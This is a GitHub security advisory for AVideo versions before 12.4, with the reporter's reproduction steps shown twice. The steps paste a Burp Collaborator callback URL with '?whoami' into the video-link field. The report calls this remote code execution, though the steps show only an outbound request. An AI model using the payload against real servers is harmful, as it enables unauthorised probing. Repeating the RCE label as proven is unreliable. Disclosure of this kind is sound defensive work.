Headline
GHSA-pgvh-p3g4-86jw: RCE when embedding a video link
Description:
I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server
Impact:
An attacker could execute remote codes on your system
Step to Reproduce:
- Go to My Videos tab
https://demo.avideo.com/mvideos
Click “Embed a video link”
Get your Burp Suite Collaborator link
Example:
o4ta880iz4vap09kaqw400po8fe52u.oastify.com
- Now put this RCE payload in the Video Link field
http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami
then click Save
- Now go to BurpSuite Collaborator client and see the response
- GitHub Advisory Database
- GitHub Reviewed
- GHSA-pgvh-p3g4-86jw
RCE when embedding a video link
Critical severity GitHub Reviewed Published Jan 31, 2023 in WWBN/AVideo • Updated Feb 2, 2023
Vulnerability details Dependabot alerts 0
Package
actions wwbn/avideo (GitHub Actions)
Affected versions
< 12.4
Patched versions
12.4
Description
Description:
I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server
Impact:
An attacker could execute remote codes on your system
Step to Reproduce:
- Go to My Videos tab
https://demo.avideo.com/mvideos
Click “Embed a video link”
Get your Burp Suite Collaborator link
Example:
o4ta880iz4vap09kaqw400po8fe52u.oastify.com
- Now put this RCE payload in the Video Link field
http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami
then click Save
- Now go to BurpSuite Collaborator client and see the response
References
- GHSA-pgvh-p3g4-86jw
Last updated
Feb 2, 2023
Reviewed
Feb 2, 2023
Published to the GitHub Advisory Database
Feb 2, 2023
DanielnetoDotCom published to WWBN/AVideo
Jan 31, 2023
Severity
Critical
Weaknesses
No CWEs
CVE ID
No known CVE
GHSA ID
GHSA-pgvh-p3g4-86jw
Source code
WWBN/AVideo
Checking history
See something to contribute? Suggest improvements for this vulnerability.